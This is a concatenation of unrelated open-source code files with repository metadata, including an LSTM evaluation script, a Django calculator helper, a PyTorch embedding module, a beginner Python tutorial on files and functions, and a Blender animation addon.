826d4da8cc659583c4853fb4e2bd9de5bafa1d8d | 3d12ddf42d8bf8503792506ff52e7f2e45ecbc76 | /prep/evaluate.py | cdfe6218d7ec5552c36ac475e40ec33cf01889f6 | [] | no_license | Jinhojeong/Thermal_Display | 5f4849410864dc2ddfa43e7d76ae8b51dd31abf8 | 16f64f373899db381b68c95e274363b9c1aec5fd | refs/heads/main | 2023-06-13T03:15:44.526154 | 2021-07-08T01:29:04 | 2021-07-08T01:29:04 | 371,365,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,239 | py | import tensorflow as tf
import numpy as np
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import datetime
import os
from tqdm import tqdm
from config import config
#'LSTM40_2hidden_tanhtanh_6432_201109'
date = 201130
model_name = '10_2LSTM4020_4hidden_tanhs_641286432_sgfon_201116'
model = tf.keras.models.load_model(
'./models/' + model_name
)
benchmark_name = 'rawdata_Al_400_2.npy'
benchmark_data = np.load(config.npy_dest_dir+benchmark_name)
if config.eval_windowing:
init_data = benchmark_data[0,1:].reshape(1,1,config.num_features)
benchmark_traj = np.repeat(init_data, config.n_steps, axis=1)
extp_size = 1
outputs_ = benchmark_data[0,1:3].reshape(-1,2)
else:
benchmark_traj = benchmark_data[:config.n_steps,1:].reshape(1,config.n_steps,config.num_features)
extp_size = config.n_steps
outputs_ = benchmark_data[:config.n_steps,1:3].reshape(-1,2)
timesteps = np.shape(benchmark_data)[0]
for idx, item in enumerate(config.scaler):
benchmark_traj[:,:,idx] = benchmark_traj[:,:,idx]/item
for t in tqdm(range(timesteps-extp_size)):
predictions = model.predict(
benchmark_traj
)[0]
pre_part = benchmark_traj[:,1:,:]
post_part = np.array([predictions[0], predictions[1], benchmark_data[t+extp_size,3]/config.scaler[2], benchmark_data[t+extp_size,4]/config.scaler[3], benchmark_data[t+extp_size,5]/config.scaler[4]]).reshape(1,1,np.shape(benchmark_traj)[2])
benchmark_traj = np.concatenate((pre_part, post_part), axis=1)
outputs_ = np.vstack((outputs_, predictions))
x_axis = benchmark_data[:,0][:timesteps]
true_hf = benchmark_data[:,1][:timesteps]
true_temp = benchmark_data[:,2][:timesteps]
est_hf = outputs_[:,0]*config.scaler[0]
est_temp = outputs_[:,1]*config.scaler[1]
plt.figure()
plt.subplot(211)
plt.plot(x_axis, true_hf, 'b-', label='True heat flux')
plt.plot(x_axis, est_hf, 'g--', label='Estimated heat flux')
plt.legend()
plt.subplot(212)
plt.plot(x_axis, true_temp, 'r-', label='True temperature')
plt.plot(x_axis, est_temp, 'k--', label='Estimated temperature')
plt.legend()
plt.savefig('../figure/{0}/{1}_{2}_extp{3}.png'.format(date, benchmark_name[:-4], model_name, extp_size), dpi=300)
plt.show()
| [
"[email protected]"
] | |
cf524498c3c354af1507470178228b9d04709912 | 9ab59fd67ef2ab343cc3036d2f9d0ad68ab887c5 | /Python/word order.py | 16a8fbd52ea859f51078c0bf030ace2c343c62d0 | [] | no_license | Arifuzzaman-Munaf/HackerRank | ff094dfc6d8a618ab9c54db4460c5190c81583bf | 5fd9b6ffa3caf3afddba5d6f35978becf989d3b8 | refs/heads/main | 2023-06-16T01:09:11.371654 | 2021-07-14T15:28:53 | 2021-07-14T15:28:53 | 385,230,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | n = int(input())
distinct = {}
for i in range(n):
word = input()
if word not in distinct :
distinct[word] = 1
else :
distinct[word] = distinct[word] + 1
print(len(distinct))
for i in distinct.values():
print(i , end=' ')
| [
"[email protected]"
] | |
d86627e50f23f2b9e75214dbd1da6239295523e1 | 4e7faaa81c7d46e3a3f98fe8ae3686809485a5f5 | /main.spec | a2b2a2f4ecdca508da6f590f7771e7bc466aa96c | [] | no_license | sayntan4u/phoenix | 7122f32f9ba8c6e8dbe6507ef3ad0f7806898f2d | 438903301cc057dc425f04cd120ae3f373e58e30 | refs/heads/main | 2023-07-11T07:40:30.676620 | 2021-08-22T16:43:52 | 2021-08-22T16:43:52 | 398,310,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | spec | # -*- mode: python ; coding: utf-8 -*-
block_cipher = None
a = Analysis(['main.py'],
pathex=['C:\\Users\\Sayantan\\Desktop\\test\\generated_code'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
hooksconfig={},
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
[],
exclude_binaries=True,
name='main',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
console=True,
disable_windowed_traceback=False,
target_arch=None,
codesign_identity=None,
entitlements_file=None )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
upx_exclude=[],
name='main')
| [
"[email protected]"
] | |
595b484f51cb641a44fd9d996752f386eb520b68 | 49f5d57221f9715a635669380da1facad93d29cf | /rest_api_calculator/calc/utils.py | 064db2f2b216d24ef6f191166f6b241ddb04cd0c | [] | no_license | marimuthuei/django-rest | 35aef6253b8b7c6d5cbd348accee304ad40a3e9c | 8398ef89f7f728b9d6d7af0384ee54667b7466e1 | refs/heads/master | 2022-04-30T17:42:09.286819 | 2021-04-15T07:39:22 | 2021-04-15T07:39:22 | 209,269,881 | 1 | 0 | null | 2022-04-22T22:24:18 | 2019-09-18T09:27:21 | Python | UTF-8 | Python | false | false | 897 | py | import math
from rest_framework.exceptions import APIException, ValidationError
from core.settings import FACTORIAl_MAX
def calculator(operator, a, b):
result = None
try:
if operator == "add":
result = a + b
elif operator == "sub":
result = a - b
elif operator == "mul":
result = a * b
elif operator == "div":
result = a / b
elif operator == "sqrt":
result = math.sqrt(a)
elif operator == "pow":
result = math.pow(a, b)
elif operator == "fact":
if 0 <= a <= FACTORIAl_MAX:
result = math.factorial(a)
else:
raise ValidationError("Factorial number computation limited to 15.")
except Exception as ex:
raise APIException("calc error : " + str(ex))
return result
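# Examples (illustrative): calculator("add", 2, 3) -> 5; calculator("pow", 2, 10) -> 1024.0;
# calculator("fact", 5, 0) -> 120, provided FACTORIAl_MAX is at least 5.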
| [
"[email protected]"
] | |
a7d182b1f7306bd17a60d4829a749ec58ebd4878 | cce056258115ff589a658d5cb3187e4145471e3f | /2020 Spring:natural language process/EXP 4:CNN-based NMT/代码/model_embeddings.py | 5df1c84c17500d1f365c21c18debea7b972341ff | [] | no_license | huochf/Course-Experiments | cd74c2de92a02bea9565d349fefefd8fa76997b4 | a91fd21582b3ac5d8fcaf1f12c4f0814cc4675db | refs/heads/master | 2023-06-08T08:43:49.962942 | 2020-09-24T01:53:24 | 2020-09-24T01:53:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,488 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS224N 2019-20: Homework 5
model_embeddings.py: Embeddings for the NMT model
Pencheng Yin <[email protected]>
Sahil Chopra <[email protected]>
Anand Dhoot <[email protected]>
Michael Hahn <[email protected]>
"""
import torch
import torch.nn as nn
# Do not change these imports; your module names should be
# `CNN` in the file `cnn.py`
# `Highway` in the file `highway.py`
# Uncomment the following two imports once you're ready to run part 1(j)
from cnn import CNN, WordCNN, WordLSTM
from highway import Highway, SelectiveConnect
# End "do not change"
class ModelEmbeddings(nn.Module):
"""
Class that converts input words to their CNN-based embeddings.
"""
def __init__(self, word_embed_size, vocab):
"""
Init the Embedding layer for one language
@param word_embed_size (int): Embedding size (dimensionality) for the output word
@param vocab (VocabEntry): VocabEntry object. See vocab.py for documentation.
Hints: - You may find len(self.vocab.char2id) useful when create the embedding
"""
super(ModelEmbeddings, self).__init__()
### YOUR CODE HERE for part 1h
self.word_embed_size = word_embed_size
self.vocab = vocab
self.e_char = 50
padding_idx = self.vocab.char_pad
self.char_embedding = nn.Embedding(len(self.vocab.char2id), self.e_char, padding_idx=padding_idx)
self.cnn = CNN(embed_size=self.e_char, num_filter=self.word_embed_size)
self.highway = Highway(embedd_size=self.word_embed_size)
self.dropout = nn.Dropout(p=0.3)
### END YOUR CODE
def forward(self, input):
"""
Looks up character-based CNN embeddings for the words in a batch of sentences.
@param input: Tensor of integers of shape (sentence_length, batch_size, max_word_length) where
each integer is an index into the character vocabulary
@param output: Tensor of shape (sentence_length, batch_size, word_embed_size), containing the
CNN-based embeddings for each word of the sentences in the batch
"""
### YOUR CODE HERE for part 1h
X_words_emb = []
for X_padded in input:
X_emb = self.char_embedding(X_padded) # batch_size x max_word_length x char_embed_size
X_reshaped = torch.transpose(X_emb, dim0=1, dim1=2)
X_conv_out = self.cnn(X_reshaped)
X_highway = self.highway(X_conv_out)
X_word_emb = self.dropout(X_highway)
X_words_emb.append(X_word_emb)
X_words_emb = torch.stack(X_words_emb)
return X_words_emb
### END YOUR CODE
class ModelEmbeddings_2(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ModelEmbeddings_2, self).__init__()
self.word_embed_size = word_embed_size
self.vocab = vocab
self.e_char = 50
padding_idx = self.vocab.char_pad
self.char_embedding = nn.Embedding(len(self.vocab.char2id), self.e_char, padding_idx=padding_idx)
self.cnn = CNN(embed_size=self.e_char, num_filter=self.word_embed_size)
self.highway = Highway(embedd_size=self.word_embed_size)
def forward(self, input):
X_words_emb = []
for X_padded in input:
X_emb = self.char_embedding(X_padded) # batch_size x max_word_length x char_embed_size
X_reshaped = torch.transpose(X_emb, dim0=1, dim1=2)
X_conv_out = self.cnn(X_reshaped)
X_highway = self.highway(X_conv_out)
X_words_emb.append(X_highway)
X_words_emb = torch.stack(X_words_emb)
return X_words_emb
class ContexAwareEmbeddings(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ContexAwareEmbeddings, self).__init__()
self.word_embed_size = word_embed_size
self.word_embedding = ModelEmbeddings_2(word_embed_size, vocab)
self.contex_cnn = WordCNN(word_embed_size=word_embed_size, num_filter=word_embed_size)
self.connect = SelectiveConnect(word_embed_size)
self.dropout = nn.Dropout(p=0.3)
def forward(self, input):
X_words_emb = self.word_embedding(input) # sentence_L x batch_size x word_embed_size
X_words_emb_reshaped = X_words_emb.permute(1, 2, 0) # batch_size x word_embed_size x sentence_L
X_contex = self.contex_cnn(X_words_emb_reshaped) # batch_size x word_embed_size x sentence_L
X_contex = X_contex.permute(2, 0, 1) # sentence_L x batch_size x word_embed_size
X_contex_embedding = self.connect(X_contex, X_words_emb)
#X_contex_embedding = self.dropout(X_contex_embedding)
return X_contex_embedding
class ContexAwareEmbeddings_LSTM(nn.Module):
def __init__(self, word_embed_size, vocab):
super(ContexAwareEmbeddings_LSTM, self).__init__()
self.word_embed_size = word_embed_size
self.word_embedding = ModelEmbeddings_2(word_embed_size, vocab)
self.contex_lstm = WordLSTM(word_embed_size=word_embed_size)
self.connect = SelectiveConnect(word_embed_size)
self.dropout = nn.Dropout(p=0.3)
def forward(self, input):
X_words_emb = self.word_embedding(input)
X_contex_lstm = self.contex_lstm(X_words_emb)
X_contex_embedding = self.connect(X_contex_lstm, X_words_emb)
#X_contex_embedding = self.dropout(X_contex_embedding)
return X_contex_embedding | [
"[email protected]"
] | |
0343fcf7a0ecf13d0cf6070e68aaf6fa43ea727c | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/stringMethods_20200707100259.py | 8206fc5fa46489851f957ce0776ea9caca48fe98 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | def array(arr):
newArr = []
for i in range(len(arr)):
        b = arr[i]  # assumed completion; the original snapshot left this assignment blank
        print(b)
array(["[6,7,5]","[1,8]"]) | [
"[email protected]"
] | |
bb13231f9aae7da4c5b2abdbf83c6c30bc07505f | 84784ef7333ae07ab36c9f40f604a6c1ac36ce17 | /Functions and Write Commands.py | 6fd0586f9f5221849bd999973c692ff775befaa3 | [] | no_license | riteshtripathi2010/Python-Learning | cf530e929adacd21611ab05f2571049b2de11982 | 969ff1041cf25f5735ec5b20fd14ee26fa1bbc83 | refs/heads/master | 2021-07-07T01:07:00.951608 | 2020-10-16T15:39:58 | 2020-10-16T15:39:58 | 187,281,914 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,467 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 19:05:45 2020
@author: riteshtripathi
"""
#Files and Functions
#write a code and bring that code whenever i need it
#File Handling
#File Handling can Open, Close, Read, Write
#f = open('kipling.txt','w') #even if this file isnt created, it will still open it
#the w is for writing in the file
#print(type(f))
# #Writing first to file
# f.write('If you can keep your head while all about you \nare losing theirs\
# #and blaming it on you,\n')
# f.write('If you can trust yourself when all men doubt you,\n\
# But make allowance for their doubting too;\n')
# #
# f.write('If you can wait and not be tired by waiting,\n\
# Or being lied about, don\'t deal in lies,\n')
# #
# f.write('Or being hated, don\'t give way to hating,\n\
# And yet don\'t look too good, nor talk too wise:\n')
# #
# f.close()
#now check the file 'kipling' is in the file explorer
#Now lets Read the file
# f = open('kipling.txt','r')
# print(type(f))
# #
# print(f.read())
# f.close()
#if you want to handle line by line, then there is this readLine command
# f = open('kipling.txt','r')
# print(f.readline())
# f.close()
# print() #this will give you the first line of the text
# f = open('kipling.txt','r')
# #
# print(type(f))
# #
# content = f.readlines()#i have stored in the variable because i want to iterate and find line by line
# f.close()
# #Appendto a file
# f = open('kipling.txt','a')
# f.write('If you can dream - and not make dreams your master;\n\
# If you can think - and not make thoughts your aim;\n')
# f.close()#after appending, we need to close the file
# print()
# #this will append from the last line
# #then we need to read that file with the new line
# f = open('kipling.txt','r')
# print(f.read())
# f.close()
# print()
#FUNCTIONS
#Some built in function in Python: MIn, Max, Sum
#lets use our own custom function called Modular Programming / Few Errors
#Wriitng your function makes programming more modular and it reduces potential errors
#Print Hello World function
# def Hello():
# print('Hello World')
# #i have created a function called hello, and it will not run unless i call it
# Hello()
# for i in range(5):
# Hello()#this will print the function 5 times
# #A function can take an argument
# def hi(name):
# print(f'Hello, {name}!')
# #here name is an input
# #lets call the function
# hi('Ritesh')
# #i can pass varibales to a function
# #in above, if i dont pass in any name, python will throw error
# #to solve that, check the code below
# def hi_2(name='Ritesh'):
# print(f'Hello, {name}!')
# hi_2()
# #if i dont pass any parameter, by default, hi_2 will take as Ritesh
#Fibonacci Sequence in a FUNCTION
#Normally for Fibonacci, we could write code as below
# n=20
# a = 0
# b = 1
# for i in range(n):
# a,b = b,a+b
# print(a)
#now lets write above code in a function and we dont have to write that code ever
# def fib(n):
# #''' Calculates and returns the nth fibonacci number'''
# a = 0
# b = 1
# for i in range(n):
# a,b = b,a+b
# return a
# fib_num = fib(20)
# print(fib_num)
# for i in range(20):
# print(fib(i))
# #this will calculate finonacci series from 1 to 20
# #lets create another function
# def calc_mean(first,*remainder):
# '''
# # This calculates the mean of numbers.
# # '''
# mean = (first + sum(remainder))/ (1 + len(remainder))
# print(type(remainder))
# return mean
# print(calc_mean(23,43,56,76,45,34,65,78,975,3456,54))
# # Docstring: with three ''' lets other user to knwo what this function is doing
# #above, *remainder tells python we dont know how many inputs we are going to get, handle it
# #in short, * can handle whatever lenght we give to the function, it can handle
#Recursion
# #in a fucntion you can call the function by itself and its called Recursion
# #Recursion can create memory drainage
# def fib_2(n):
# if n == 0:
# return 0
# elif n == 1:
# return 1
# else:
# return fib_2(n-1) + fib_2(n-2)
# #All recurscive functions need base case, they need to resolve for something or else it will keep running forever
# #here base case is 0 and 1, it will keep checking for 0 and 1, as soon as it equals to 0 and 1
# #it will not call any functions
# #untill these base case have gone to more than 1
# x = fib_2(20)
# print(x)
#skipped more on fibonnaci numbers like a min video,
#because using recursion method takes fib function to execute in 25mins
#iterative function is less by 25mins faster
#so far we have created three function and all those functions are saved under one file called
#Files and Functions
#i can open FIles and Functions in other page by calling that file name and then dot to access each function
# #Eg
# import FilesandFunction
# x = FilesandFunctions.fib(20)
#this is called MODULE
#More on Functions
#A function can return more than one value
#its done by tuple of values
# def sum_and_mult(a,b):
# total = a + b
# product = a * b
# return total, product
# #above returns sum and product of two values
# #lets call the function
# func_call = sum_and_mult(3,4)
# print(func_call)
# print(type(func_call))
# #another way of returning tuple values
# var_1, var_2 = sum_and_mult(6,7)
# #here var1 will return the addition of 6 and 7
# #here var2 will return the multiplication of 6 and 7
# #Another point to note,
# #a variable declared outside the function will be differetn from the variables
# #defined inside the function
# var_3 = 5
# var_4 = 6
# #
# def add1(var_3,var_4):
# var_3 = var_3 + 1
# var_4 = var_4 + 1
# print(f'Inside the function var_3 = {var_3} and var_4 = {var_4}')
# return var_3,var_4
# #
# add1(18,19)
# print(f'But outside the function var_3 = {var_3} and var_4 = {var_4}')
# #above code is self explanotary
# #another point to note
# #if you put mutable values inside the function,
# #those values willlll change
# def lengthen_list(n,my_list = [1,2,3]):#here it takes values n and my_list
# #but if my_list hasnt been given value, by default it would be 1,2,3
# my_list.append(n)
# return my_list
# x = lengthen_list(4)
# #this is like the first call
# x = lengthen_list(4)
# ##this is like the second call
# x = lengthen_list(4)
# #this is like the third call
# #whats happening above is that, values 1,2,3
# #will get append first time by 4
# #the number of times x is shown, the value will keep appending
# #reuslts 1,2,3,4,4,4,
# #inshort everytime we call x, it will keep appending and we dont want that
# #rather we code:
# def lengthen_list_2(n,my_list = None):
# if my_list == None:#checking the condition, if its true
# my_list = [1,2,3]
# my_list.append(n)
# return my_list
# #y = lengthen_list_2(4)
# ##
# #y = lengthen_list_2(4)
# ##
# #y = lengthen_list_2(4)
#main thing to note, we need to define function before we call it
# def multi_ply(a,b):
# return a * b
# p = multi_ply(3,4)
#Practical Tests
#Question 1
#Create a function that will calculate the sum of two numbers. Call it sum_two.
# def sum_two(a,b):
# '''This function returns the sum of two numbers'''
# return a + b
# print(f'The sum of 3 and 4 is {sum_two(3,4)}' )
# Question 2
# Write a function that performs multiplication of two arguments. By default the
# function should multiply the first argument by 2. Call it multiply.
# def multiply(a,b=2):
# '''
# Returns the product of a and b; if b not given
# returns 2 * a.
# '''
# return a * b
# #
# print(f'Inputting 3 gives {multiply(3)}')
# print(f'Inputting 3 and 5 gives {multiply(3,5)}')
#Question 3
#Write a function to calculate a to the power of b. If b is not given
#its default value should be 2. Call it power.
#'''
# def power(a,b=2):
# '''
# Returns a**b; if b not given,
# it will return a**2
# '''
# return a ** b
# print(f'Inputting 8 gives {power(8)}')
# print(f'Inputting 2 and 8 gives {power(2,8)}')
##Question 4
##Create a new file called capitals.txt , store the names of five capital cities
##in the file on the same line.
##'''
#file = open('capitals.txt','w')
#file.write('London, ')
#file.write('Paris, ')
#file.write('Madrid, ')
#file.write('Lisbon, ')
#file.write('Rome,')
#file.close()
#Question 5
#Write some code that requests the user to input another capital city.
#Add that city to the list of cities in capitals. Then print the file to
#the screen.
#'''
#user_input = input('Plese enter a capital city:> ')
#
#file = open('capitals.txt','a')
#file.write('\n' + user_input)
#file.close
#
#file = open('capitals.txt','r')
#print(file.read())
#file.close
#Question 6
#Write a function that will copy the contents of one file to a new file.
# '''
# def copy_file(infile,outfile):
# ''' Copies the contents of infile to a new file, outfile.'''
# with open(infile) as file_1:
# with open(outfile, "w") as file_2:
# file_2.write(file_1.read())
# copy_file('capitals.txt','new_capitals.txt')
| [
"[email protected]"
] | |
31c8805acb94964e9727c888e6b71f3bacfefb7f | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/commotion/helpers.py | 9e9244763a1c14490e6638133246a23eaba87248 | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,875 | py | import bpy
def show_error_message(message):
def draw(self, context):
self.layout.label(message)
bpy.context.window_manager.popup_menu(draw, title='Error', icon='ERROR')
def shape_list_refresh(context):
scene = context.scene
skcoll = scene.commotion_skcoll
if hasattr(scene, 'commotion_skcoll'):
for sk in skcoll:
skcoll.remove(0)
i = 0
for kb in context.active_object.data.shape_keys.key_blocks:
skcoll.add()
skcoll[i].name = kb.name
skcoll[i].index = i
i += 1
def update_sp(self, context):
scene = context.scene
skcoll = scene.commotion_skcoll
props = scene.commotion
key = context.active_object.data.shape_keys
if key.use_relative:
for sk in skcoll:
if sk.selected:
key.key_blocks[sk.index].value = props.shape_value
else:
for ob in context.selected_objects:
for sk in skcoll:
if sk.selected:
ob.data.shape_keys.key_blocks[sk.index].interpolation = props.shape_interpolation
def auto_keyframes(context):
frame = context.scene.frame_current
for ob in context.selected_objects:
key = ob.data.shape_keys
key.eval_time = int(key.key_blocks[1].frame)
key.keyframe_insert(data_path='eval_time', frame=frame)
key.eval_time = int(key.key_blocks[-1].frame)
key.keyframe_insert(data_path='eval_time', frame=frame + 20)
def keyframes_offset(fcus, i, context):
frame = context.scene.frame_current
for fcu in fcus:
fcu_range = fcu.range()[0]
for kp in fcu.keyframe_points:
kp.co[0] = kp.co[0] + frame + i - fcu_range
kp.handle_left[0] = kp.handle_left[0] + frame + i - fcu_range
kp.handle_right[0] = kp.handle_right[0] + frame + i - fcu_range
def strips_offset(strip, i, context):
frame = context.scene.frame_current
strip.frame_end = frame - 1 + i + strip.frame_end
strip.frame_start = frame + i
strip.scale = 1
def data_access(mode, ob, i, context):
if 'FCURVES' in mode:
if 'SHAPE_KEYS' in mode:
fcus = ob.data.shape_keys.animation_data.action.fcurves
elif 'OBJECT' in mode:
fcus = ob.animation_data.action.fcurves
keyframes_offset(fcus, i, context)
elif 'NLA' in mode:
if 'SHAPE_KEYS' in mode:
strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
elif 'OBJECT' in mode:
strip = ob.animation_data.nla_tracks[0].strips[0]
strips_offset(strip, i, context)
elif 'PARENT' in mode:
ob.use_slow_parent = True
ob.slow_parent_offset = i
def offset_cursor(offset, threshold, mode, context):
cursor = context.scene.cursor_location
dist = {}
for ob in context.selected_objects:
distance = (cursor - (ob.location + ob.delta_location)).length
dist[ob] = distance
if 'REVERSE' in mode:
dist = sorted(dist, key=dist.get, reverse=True)
else:
dist = sorted(dist, key=dist.get)
i = 0
i2 = threshold
for ob in dist:
data_access(mode, ob, i, context)
if i2 > 1:
if i2 <= (dist.index(ob) + 1):
i2 += threshold
i += offset
else:
i += offset
def offset_name(offset, threshold, mode, context):
obs = context.selected_objects
dist = {}
for ob in obs:
dist[ob] = ob.name
if 'REVERSE' in mode:
dist = sorted(dist, key=dist.get, reverse=True)
else:
dist = sorted(dist, key=dist.get)
i = 0
i2 = threshold
for ob in dist:
data_access(mode, ob, i, context)
if i2 > 1:
if i2 <= (dist.index(ob) + 1):
i2 += threshold
i += offset
else:
i += offset
def offset_parent(offset, context):
mode = ['PARENT']
dist = {}
for ob in context.selected_objects:
if ob.parent:
distance = (ob.parent.location - (ob.location + ob.delta_location + ob.parent.location)).length
dist[ob] = distance
dist = sorted(dist, key=dist.get)
i = 0 + offset
for ob in dist:
data_access(mode, ob, i, context)
i += offset
def offset_multitarget(objects, targets, offset, threshold, mode, context):
obs = {}
for ob in objects:
targs = {}
for t in targets:
distance = (t.location - (ob.location + ob.delta_location)).length
targs[distance] = t
dist = sorted(targs)[0]
obs[ob] = [dist, targs[dist]]
for t in targets:
obs_thold = []
i = 0
i2 = threshold
if 'REVERSE' in mode:
obs_sorted = sorted(obs, key=obs.get, reverse=True)
else:
obs_sorted = sorted(obs, key=obs.get)
for ob in obs_sorted:
if obs[ob][1] == t:
data_access(mode, ob, i, context)
if i2 > 1:
obs_thold.append(ob)
if i2 <= (obs_thold.index(ob) + 1):
i += offset
i2 += threshold
else:
i += offset
def create_nla_tracks(anim):
frst_frame = anim.action.frame_range[0]
if not anim.nla_tracks:
anim.nla_tracks.new()
anim.nla_tracks[0].strips.new('name', frst_frame, anim.action)
anim.action = None
def create_strips(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
if ob.data.shape_keys:
anim = ob.data.shape_keys.animation_data
else:
return show_error_message('Selected objects have no Shape Keys')
create_nla_tracks(anim)
elif 'OBJECT' in mode:
for ob in obs:
if ob.animation_data:
anim = ob.animation_data
else:
return show_error_message('Selected objects have no Animation')
create_nla_tracks(anim)
def link_strips(obj_strip, ob_strip):
obj_a_s = obj_strip.action_frame_start
obj_a_e = obj_strip.action_frame_end
ob_strip.action = obj_strip.action
ob_strip.action_frame_start = obj_a_s
ob_strip.action_frame_end = obj_a_e
def link_to_active(mode, context):
obj = context.active_object
obs = context.selected_objects
if 'NLA' in mode:
if 'SHAPE_KEYS' in mode:
obj_strip = obj.data.shape_keys.animation_data.nla_tracks[0].strips[0]
for ob in obs:
ob_strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
link_strips(obj_strip, ob_strip)
elif 'OBJECT' in mode:
obj_strip = obj.animation_data.nla_tracks[0].strips[0]
for ob in obs:
ob_strip = ob.animation_data.nla_tracks[0].strips[0]
link_strips(obj_strip, ob_strip)
elif 'FCURVES' in mode:
if 'SHAPE_KEYS' in mode:
action = obj.data.shape_keys.animation_data.action
for ob in obs:
if ob.data.shape_keys.animation_data:
ob.data.shape_keys.animation_data.action = action
else:
ob.data.shape_keys.animation_data_create()
ob.data.shape_keys.animation_data.action = action
elif 'OBJECT' in mode:
action = obj.animation_data.action
for ob in obs:
if ob.animation_data:
ob.animation_data.action = action
else:
ob.animation_data_create()
ob.animation_data.action = action
def copy_to_selected(mode, context):
obj = context.active_object
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
action = obj.data.shape_keys.animation_data.action
for ob in obs:
if ob.data.shape_keys:
if ob.data.shape_keys.animation_data:
ob.data.shape_keys.animation_data.action = action.copy()
else:
ob.data.shape_keys.animation_data_create()
ob.data.shape_keys.animation_data.action = action.copy()
else:
return show_error_message('Selected objects have no Shape Keys')
elif 'OBJECT' in mode:
action = obj.animation_data.action
for ob in obs:
if ob.animation_data:
ob.animation_data.action = action.copy()
else:
ob.animation_data_create()
ob.animation_data.action = action.copy()
def remove_nla_track(anim):
trks = anim.nla_tracks
anim.action = trks[0].strips[0].action
trks.remove(trks[0])
def strips_to_fcurves(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
anim = ob.data.shape_keys.animation_data
remove_nla_track(anim)
elif 'OBJECT' in mode:
for ob in obs:
anim = ob.animation_data
remove_nla_track(anim)
def sync_len(mode, context):
obs = context.selected_objects
if 'SHAPE_KEYS' in mode:
for ob in obs:
strip = ob.data.shape_keys.animation_data.nla_tracks[0].strips[0]
strip.action_frame_end = (strip.action_frame_start + strip.action.frame_range[1] - 1)
elif 'OBJECT' in mode:
for ob in obs:
strip = ob.animation_data.nla_tracks[0].strips[0]
strip.action_frame_end = (strip.action_frame_start + strip.action.frame_range[1] - 1)
def driver_set(context):
obj = context.active_object
try:
for ob in context.selected_objects:
if ob != obj:
key = ob.data.shape_keys
kb = int(key.key_blocks[1].frame)
kb_last = str(int(key.key_blocks[-1].frame) + 5)
key.driver_add('eval_time')
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
drv = fcu.driver
drv.type = 'SCRIPTED'
drv.expression = kb_last + '-(dist*3/sx)'
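                        # With the last key block at frame 85, for instance, this becomes
                        # "90-(dist*3/sx)": eval_time rises toward the final shape key as the
                        # distance to the active object shrinks, scaled by its X scale.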
drv.show_debug_info = True
var = drv.variables.new()
var.name = 'dist'
var.type = 'LOC_DIFF'
var.targets[0].id = ob
var.targets[1].id = obj
var = drv.variables.new()
var.name = 'sx'
var.type = 'SINGLE_PROP'
var.targets[0].id = obj
var.targets[0].data_path = 'scale[0]'
if fcu.modifiers:
fcu.modifiers.remove(fcu.modifiers[0])
fcu.keyframe_points.insert(0, kb)
fcu.keyframe_points.insert(kb, kb)
fcu.keyframe_points.insert(kb + 10, kb + 10)
fcu.extrapolation = 'LINEAR'
for kp in fcu.keyframe_points:
kp.interpolation = 'LINEAR'
except:
return show_error_message('Selected objects have no Shape Keys')
def targets_remap(context):
for ob in context.selected_objects:
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
for var in fcu.driver.variables:
if var.name == 'dist':
var.targets[0].id = ob
def expression_copy(context):
active_fcus = context.active_object.data.shape_keys.animation_data.drivers
for active_fcu in active_fcus:
if active_fcu.data_path == 'eval_time':
for ob in context.selected_objects:
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = active_fcu.driver.expression
def dist_trigger(var, name):
etm = bpy.context.scene.objects[name].data.shape_keys.eval_time
if var > etm:
etm = var
return etm
def register_driver_function(context):
bpy.app.driver_namespace['dist_trigger'] = dist_trigger
for ob in context.scene.objects:
if (ob.data and ob.data.shape_keys and
ob.data.shape_keys.animation_data and
ob.data.shape_keys.animation_data.drivers):
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = fcu.driver.expression
def expression_func_set(context):
props = context.scene.commotion
expr = props.sk_drivers_expression_func
for ob in context.selected_objects:
func_expr = "dist_trigger(%s, '%s')" % (expr, ob.name)
fcus = ob.data.shape_keys.animation_data.drivers
for fcu in fcus:
if fcu.data_path == 'eval_time':
fcu.driver.expression = func_expr
| [
"[email protected]"
] | |
